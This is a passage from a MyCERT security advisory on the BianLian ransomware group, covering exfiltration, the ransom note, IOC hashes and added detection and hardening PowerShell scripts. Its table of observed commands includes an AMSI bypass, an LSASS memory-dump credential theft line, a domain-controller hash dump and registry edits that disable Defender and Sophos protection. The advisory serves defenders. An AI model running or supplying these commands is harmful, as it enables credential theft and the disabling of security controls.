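    'net group "Domain Admins" /domain',
    'nltest /dclist:',
    'cmd.exe /Q /c quser 1> \\127.0.0.1\C$\Windows\Temp\out 2>&1',
    'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 \Windows\Temp\l.csv full',
    'svchost.exe -k netsvcs'   # benign: must not match anything
)
foreach ($c in $constructed) { "{0,-70} -> {1}" -f $c, ((Test-BianLianCommandLine $c) -join '; ') }

# Live sweep of the last 72 hours on this host.
Find-BianLianCommandLines -Hours 72 | Sort-Object Time | Format-Table -AutoSize -Wrap
```

The first four constructed lines each report their section tag and the svchost line reports nothing. Several of these commands (net group /domain, nltest, quser) are also run legitimately by administrators and monitoring agents, so treat a single hit as a lead and look at the parent process, the user, and whether several tags fire on one host inside a short window, which is the pattern sections 2.4 to 2.6 describe.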

2.7 Collection
FBI observed BianLian group actors using malware (system.exe) that enumerates registry and files and copies clipboard data from users.

2.8 Exfiltration and Impact
BianLian group actors search for sensitive files using PowerShell scripts (See Appendix: Windows PowerShell and Command Shell Activity) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files after exfiltration for double extortion. 
BianLian group uses File Transfer Protocol (FTP) and Rclone, a tool used to sync files to cloud storage, to exfiltrate data. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as programdata\vmware and Music folders. ACSC observed BianLian group actors use the Mega file-sharing service to exfiltrate victim data. 
BianLian’s encryptor (encryptor.exe) modified all encrypted files to have the .bianlian extension. The encryptor created a ransom note, Look at this instruction.txt, in each affected directory (see Figure 1 for an example ransom note). According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.


Figure 1: BianLian Sample Ransom Note (Look at this instruction.txt)

If a victim refuses to pay the ransom demand, BianLian group threatens to publish exfiltrated data to a leak site maintained on the Tor network. The ransom note provides the Tox ID A4B3B0845DA242A64BF17E0DB4278EDF85855739667D3E2AE8B89D5439015F07E81D12D767FC, which does not vary across victims. The Tox ID directs the victim organization to a Tox chat via https://qtox.github[.]io and includes an alternative contact email address (swikipedia@onionmail[.]org or xxx@mail2tor[.]com). The email address is also the same address listed on the group’s Tor site under the contact information section. Each victim company is assigned a unique identifier included in the ransom note. BianLian group receives payments in unique cryptocurrency wallets for each victim company. 
BianLian group engages in additional techniques to pressure the victim into paying the ransom; for example, printing the ransom note to printers on the compromised network. Employees of victim companies also reported receiving threatening telephone calls from individuals associated with BianLian group.
 

3.0 Indicators of Compromise
See Table 1 for IOCs obtained from FBI investigations as of March 2023.

Name: def.exe
SHA-256: 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893
Description: Malware associated with BianLian intrusions; an example of a possible backdoor developed by BianLian group.

Name: encryptor.exe
SHA-256: 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
Description: Example of a BianLian encryptor.

Name: exp.exe
SHA-256: 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500
Description: Possible Netlogon vulnerability (CVE-2020-1472) exploitation.

Name: system.exe
SHA-256: 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce
Description: Enumerates registry and files. Reads clipboard data.

Table 1: BianLian Ransomware and Data Extortion Group IOCs

Through FBI investigation as of March 2023, FBI has observed BianLian actors use the commands in Table 2. ACSC has observed BianLian actors use some of the same commands.

 

Command: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Use: Disables AMSI on Windows. AMSI is a built-in feature on Windows 10 and newer that provides an interface for anti-malware scanners to inspect scripts prior to execution. When AMSI is disabled, malicious scripts may bypass antivirus solutions and execute undetected.

Command: cmd.exe /Q /c for /f "tokens=1,2 delims= " ^%A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full
Use: Creates a memory dump of the lsass.exe process and saves it with a .csv extension (MITRE ATT&CK T1003.001, https://attack.mitre.org/versions/v12/techniques/T1003/001/). BianLian actors used it to harvest credentials from lsass.exe.

Command: cmd.exe /Q /c net user <admin> /active:yes 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1
Use: Activates the local Administrator account.

Command: cmd.exe /Q /c net user "<admin>" <password> 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1
Use: Changes the password of the newly activated local Administrator account.

Command: cmd.exe /Q /c quser 1> \\127.0.0.1\C$\Windows\Temp\<folder> 2>&1
Use: Executes quser.exe to query the currently logged-in users on a machine. The command is provided arguments to run quietly and exit upon completion, and the output is directed to the \Windows\Temp directory.

Command: dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart
Use: Using the Deployment Image Servicing and Management (DISM) executable, removes the Windows Defender feature.

Command: dump.exe -no-pass -just-dc user.local/<fileserver.local>\@<local_ip>
Use: Executes secretsdump.py, a Portable Executable version of an Impacket tool. Used to dump password hashes from domain controllers.

Command: exp.exe -n <fileserver.local> -t <local_ip>
Use: Possibly attempted exploitation of the Netlogon vulnerability (CVE-2020-1472).

Command: findstr /spin "password" *.* >C:\Users\training\Music\<file>.txt
Use: Searches for the string "password" in all files in the current directory and its subdirectories and writes the output to a file.

Command: ldap.exe -u user\<user> -p <password> ldap://<local_ip>
Use: Connects to the organization’s Lightweight Directory Access Protocol (LDAP) server.

Command: logoff
Use: Logs off the current user from a Windows session. Can be used to log off multiple users at once.

Command: mstsc
Use: Launches the Microsoft Remote Desktop Connection client application in Windows.

Command: net group /domain
Use: Retrieves a list of all groups from the domain controller.

Command: net group 'Domain Admins' /domain
Use: Queries the domain controller to retrieve a list of all accounts in the Domain Admins group.

Command: net group 'Domain Computers' /domain
Use: Queries the domain controller to retrieve a list of all accounts in the Domain Computers group.

Command: net user /domain
Use: Queries the domain controller to retrieve a list of all users in the domain.

Command: net.exe localgroup "Remote Desktop Users" <user> /add
Use: Adds a user account to the local Remote Desktop Users group.

Command: net.exe user <admin> <password> /domain
Use: Modifies the password for the specified account.

Command: netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in protocol=TCP localport=<port num> action=allow
Use: Adds a new rule to the Windows firewall that allows incoming RDP traffic.

Command: netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes
Use: Enables the pre-existing Windows firewall rule group named Remote Desktop. This rule group allows incoming RDP traffic.

Command: nltest /dclist
Use: Retrieves a list of domain controllers.

Command: nltest /domain_trusts
Use: Retrieves a list of domain trusts.

Command: ping.exe -4 -n 1 *
Use: Sends a single ICMP echo request packet to all devices on the local network using the IPv4 protocol. The output of the command will show whether each device is reachable.

Command: quser; ([adsisearcher]"(ObjectClass=computer)").FindAll().count;([adsisearcher]"(ObjectClass=user)").FindAll().count;[Security.Principal.WindowsIdentity]::GetCurrent() | select name;net user "$env:USERNAME" /domain; (Get-WmiObject -class Win32_OperatingSystem).Caption; Get-WmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest /DOMAIN_TRUSTS
Use: Lists the current Windows identity for the logged-in user and displays the user's name. Uses the Active Directory Services Interface (ADSI) to search for all computer and user objects in the domain and returns counts of the quantities found. Lists information about the current user account from the domain, such as the user's name, description, and group memberships. Lists information about the operating system installed on the local computer. Lists information about the "Domain Admins" group from the domain. Lists all domain controllers in the domain. Displays information about domain trusts.

Command: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Use: Adds/overwrites a Registry value to disable Network Level Authentication (NLA) for RDP connections, so the RDP logon screen is reachable without authenticating first.

Command: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
Use: Adds/overwrites a Registry value to allow a user to receive help from Remote Assistance.

Command: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config" /t REG_DWORD /v SAVEnabled /d 0 /f
Use: Adds/overwrites a Registry value to disable the Sophos tamper protection setting named SAVEnabled.

Command: reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config" /t REG_DWORD /v SEDEnabled /d 0 /f
Use: Adds/overwrites a Registry value to disable the Sophos tamper protection setting named SEDEnabled.

Command: reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection /t REG_DWORD /v Enabled /d 0 /f
Use: Adds/overwrites a Registry value to disable tamper protection for the Sophos antivirus service called SAVService.

Command: reg.exe copy hklm\system\CurrentControlSet\services\tvnserver hklm\system\CurrentControlSet\control\safeboot\network\tvnserver /s /f
Use: Copies the configuration settings for the tvnserver service to a new location in the registry that is used when the computer boots into Safe Mode with Networking. This allows the service to run with the same settings in Safe Mode as it does in normal mode.

Command: s.exe /threads:50 /ldap:all /verbose /outfile:c:\users\<user>\desktop\1.txt
Use: Executes SharpShares.

Command: schtasks.exe /RU SYSTEM /create /sc ONCE /<user> /tr "cmd.exe /c rundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43
Use: Creates a Scheduled Task that runs as SYSTEM at 04:43 AM. When the task is run, cmd.exe uses rundll32.exe to run the DLL file netsh.dll. (It is likely that netsh.dll is a malware file and not associated with netsh.)

Command: start-process PowerShell.exe -arg C:\Users\Public\Music\<file>.ps1 -WindowStyle Hidden
Use: Executes a PowerShell script while keeping the PowerShell window hidden from the user.

Table 2: PowerShell and Windows Command Shell Activity
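Most of the Table 2 activity leaves durable state on the host: registry values, a scheduled task, a firewall rule, group membership and dropped files. The script below is an added example written for this advisory, not part of the MyCERT/CISA text and not BianLian tooling; it audits one Windows host for those artifacts and for files matching the Table 1 hashes. It assumes an elevated PowerShell 5.1 or later session; the drop folders it searches are the ones section 2.8 and Table 2 name (programdata\vmware, Public\Music and per-user Music), and the DLL name check (netsh.dll under C:\ProgramData) is the one Table 2's scheduled task loads.

```powershell
# Added example, not part of the MyCERT/CISA advisory: hunts one Windows host for the persistent
# artifacts Table 2 shows BianLian leaving behind (registry values, SafeBoot service copy,
# scheduled task, firewall rule, RDP group members) and for files matching the Table 1 hashes.
# Assumptions: elevated PowerShell 5.1+; drop folders limited to those named in 2.8 and Table 2.

$findings = New-Object 'System.Collections.Generic.List[string]'

# Registry values from Table 2: Path, value Name, the value BianLian set (Bad), and what it means.
$registryChecks = @(
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
       Name = 'UserAuthentication'; Bad = 0; Why = 'RDP Network Level Authentication disabled' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
       Name = 'fAllowToGetHelp'; Bad = 1; Why = 'Remote Assistance enabled' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config'
       Name = 'SAVEnabled'; Bad = 0; Why = 'Sophos tamper protection (SAVEnabled) disabled' },
    @{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config'
       Name = 'SEDEnabled'; Bad = 0; Why = 'Sophos tamper protection (SEDEnabled) disabled' },
    @{ Path = 'HKLM:\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection'
       Name = 'Enabled'; Bad = 0; Why = 'Sophos SAVService tamper protection disabled' }
)
foreach ($c in $registryChecks) {
    $item = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
    if ($null -ne $item -and $item.($c.Name) -eq $c.Bad) {
        $findings.Add("REGISTRY: $($c.Why) ($($c.Path)\$($c.Name) = $($c.Bad))")
    }
}

# Table 2: tvnserver copied under SafeBoot\Network so the VNC service also starts in Safe Mode.
if (Test-Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\tvnserver') {
    $findings.Add('REGISTRY: tvnserver registered under SafeBoot\Network (survives Safe Mode with Networking)')
}

# Table 2: dism.exe /Disable-Feature /FeatureName:Windows-Defender /Remove. Query the same feature name;
# on editions where the feature does not exist the cmdlet returns nothing and the check is skipped.
$defender = Get-WindowsOptionalFeature -Online -FeatureName 'Windows-Defender' -ErrorAction SilentlyContinue
if ($defender -and $defender.State -ne 'Enabled') {
    $findings.Add("DEFENDER: optional feature Windows-Defender is in state $($defender.State)")
}

# Table 2: scheduled task running rundll32 against a DLL dropped in C:\ProgramData.
foreach ($task in Get-ScheduledTask) {
    foreach ($action in $task.Actions) {
        $cmd = "$($action.Execute) $($action.Arguments)"
        if ($cmd -match '(?i)rundll32' -and $cmd -match '(?i)programdata') {
            $findings.Add("TASK: '$($task.TaskName)' runs [$cmd] as $($task.Principal.UserId)")
        }
    }
}
if (Test-Path "$env:ProgramData\netsh.dll") {
    $findings.Add("FILE: $env:ProgramData\netsh.dll present (the DLL Table 2's task loads via rundll32)")
}

# Table 2: netsh rule literally named "allow RemoteDesktop", and accounts added to Remote Desktop Users.
if (Get-NetFirewallRule -DisplayName 'allow RemoteDesktop' -ErrorAction SilentlyContinue) {
    $findings.Add("FIREWALL: inbound rule named 'allow RemoteDesktop' exists")
}
foreach ($m in (Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue)) {
    $findings.Add("RDP-GROUP: member $($m.Name) [$($m.ObjectClass)]; confirm this membership is authorised")
}

# Table 1 hashes, checked against the drop folders section 2.8 and Table 2 name.
$iocHashes = @{
    '7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893' = 'def.exe (possible backdoor)'
    '1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43' = 'encryptor.exe'
    '0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500' = 'exp.exe (possible CVE-2020-1472 exploit)'
    '40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce' = 'system.exe (clipboard/registry collector)'
}
$dropFolders = @("$env:ProgramData\vmware", 'C:\Users\Public\Music') +
               (Get-ChildItem 'C:\Users' -Directory | ForEach-Object { Join-Path $_.FullName 'Music' })
foreach ($folder in $dropFolders) {
    if (-not (Test-Path $folder)) { continue }
    foreach ($file in Get-ChildItem -Path $folder -File -Recurse -Include *.exe, *.dll -ErrorAction SilentlyContinue) {
        $hash = (Get-FileHash -Path $file.FullName -Algorithm SHA256).Hash.ToLower()
        if ($iocHashes.ContainsKey($hash)) {
            $findings.Add("IOC: $($file.FullName) matches Table 1 hash for $($iocHashes[$hash])")
        }
    }
}

if ($findings.Count -eq 0) { Write-Output 'No Table 1 / Table 2 artifacts found on this host.' }
else { $findings | ForEach-Object { Write-Output "[!] $_" } }
```

Two caveats when reading the output. The AMSI bypass in Table 2 is an in-memory reflection call and leaves no registry trace, so it is only visible through PowerShell script block logging (Event ID 4104), not through this script; and a missing Sophos key simply means Sophos is not installed, which the script treats as no finding rather than as tampering.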

4.0 Recommendations
MyCERT recommends that organizations implement the recommendations below to improve their cybersecurity posture on the basis of the threat actor’s activity.

  • Reduce threat of malicious actors using remote access tools by: 
    • Auditing remote access tools on your network to identify currently used and/or authorized software.
    • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable.
    • Using security software to detect instances of remote access software only being loaded in memory. 
    • Requiring authorized remote access solutions only be used from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
    • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
  • Implement application controls to manage and control execution of software.
  • Strictly limit the use of RDP and other remote desktop services.
  • Disable command-line and scripting activities and permissions.
  • Restrict the use of PowerShell.
  • Update Windows PowerShell or PowerShell Core.
  • Enable enhanced PowerShell logging.
  • Configure the Windows Registry to require User Account Control (UAC) approval for any PsExec operations.
  • Review domain controllers, servers, workstations, and active directories.
  • Audit user accounts.
  • Implement time-based access for accounts set at the admin level and higher.
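Several items in the list above (enhanced PowerShell logging, limiting RDP, UAC approval for PsExec, account auditing) are single registry values or local-group queries on each Windows host. The script below is an added example written for this advisory, not part of the MyCERT/CISA text; it applies those settings to one machine and reads them back. It assumes an elevated session and should be tested in a lab first; at fleet scale the same values belong in Group Policy, which writes these exact registry paths. The mapping of "UAC approval for any PsExec operations" to the LocalAccountTokenFilterPolicy value is my reading of that recommendation, not something the advisory states.

```powershell
# Added example, not part of the MyCERT/CISA advisory: applies host-level items from the
# recommendations list (PowerShell logging, RDP NLA, UAC for remote local-admin use, account audit)
# to one Windows machine and reads the settings back. Assumptions: elevated PowerShell 5.1+;
# the PsExec/UAC item is interpreted as LocalAccountTokenFilterPolicy = 0.

function Set-RegDword {
    param([string]$Path, [string]$Name, [int]$Value)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    New-ItemProperty -Path $Path -Name $Name -PropertyType DWord -Value $Value -Force | Out-Null
}

# "Enable enhanced PowerShell logging". Script block logging (Event ID 4104) records the
# de-obfuscated text of every script block, including in-memory tricks such as the AMSI
# reflection one-liner in Table 2; module logging (4103) records pipeline activity for the
# modules listed under ModuleNames ('*' = all).
$psPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'
Set-RegDword -Path "$psPolicy\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Value 1
Set-RegDword -Path "$psPolicy\ModuleLogging"      -Name 'EnableModuleLogging'      -Value 1
if (-not (Test-Path "$psPolicy\ModuleLogging\ModuleNames")) {
    New-Item -Path "$psPolicy\ModuleLogging\ModuleNames" -Force | Out-Null
}
New-ItemProperty -Path "$psPolicy\ModuleLogging\ModuleNames" -Name '*' -PropertyType String -Value '*' -Force | Out-Null

# "Strictly limit the use of RDP": require Network Level Authentication (Table 2 shows BianLian
# setting this value to 0) and keep the built-in "Remote Desktop" firewall group disabled.
# Skip the Disable-NetFirewallRule line on hosts that must accept RDP.
Set-RegDword -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name 'UserAuthentication' -Value 1
Disable-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue

# "Require UAC approval for any PsExec operations" (assumed mapping): with
# LocalAccountTokenFilterPolicy = 0, the Windows default, a local Administrators member connecting
# over SMB (which is how PsExec operates) receives a filtered, non-elevated token, so a stolen
# local-admin password alone does not give PsExec admin rights. A value of 1 removes that
# restriction, so enforce 0 explicitly.
Set-RegDword -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'LocalAccountTokenFilterPolicy' -Value 0

# "Audit user accounts": who holds local admin, who may RDP in, and which local accounts are enabled.
function Get-LocalAccountAudit {
    [pscustomobject]@{
        LocalAdministrators = (Get-LocalGroupMember -Group 'Administrators' | ForEach-Object Name) -join ', '
        RemoteDesktopUsers  = (Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue | ForEach-Object Name) -join ', '
        EnabledLocalUsers   = (Get-LocalUser | Where-Object Enabled | ForEach-Object Name) -join ', '
    }
}

# Read the settings back so the change is verifiable and can be recorded.
Get-ItemProperty -Path "$psPolicy\ScriptBlockLogging" | Select-Object EnableScriptBlockLogging
Get-ItemProperty -Path "$psPolicy\ModuleLogging"      | Select-Object EnableModuleLogging
Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' | Select-Object UserAuthentication
Get-LocalAccountAudit
```

Script block logging is only useful if the events are shipped off the host: 4104 events land in Microsoft-Windows-PowerShell/Operational, which a ransomware actor can clear locally, so forward it to central logging before relying on it.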

In addition, MyCERT recommends that network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the impact and risk of compromise by ransomware or data extortion actors:

  • Implement a recovery plan.
  • Maintain offline backups of data.
  • Require phishing-resistant multifactor authentication.
  • Keep all operating systems, software, and firmware up to date.
  • Segment networks.
  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.
  • Install, regularly update, and enable real time detection for antivirus software.
  • Disable unused ports.
  • Consider adding an email banner to emails.
  • Ensure all backup data is encrypted and immutable.

Generally, MyCERT advises users of these systems to keep up to date with the latest security announcements from the vendor and to follow best-practice security policies when deciding which updates to apply.

For further enquiries, please contact MyCERT through the following channels:

E-mail: cyber999[at]cybersecurity.my 
Phone: 1-300-88-2999 (monitored during business hours) 
Mobile: +60 19 2665850 (24x7 call incident reporting) 
Business Hours: Mon - Fri 09:00 -18:00 MYT 
Web: https://www.mycert.org.my 
Twitter: https://twitter.com/mycert 
Facebook: https://www.facebook.com/mycert.org.my

5.0    References
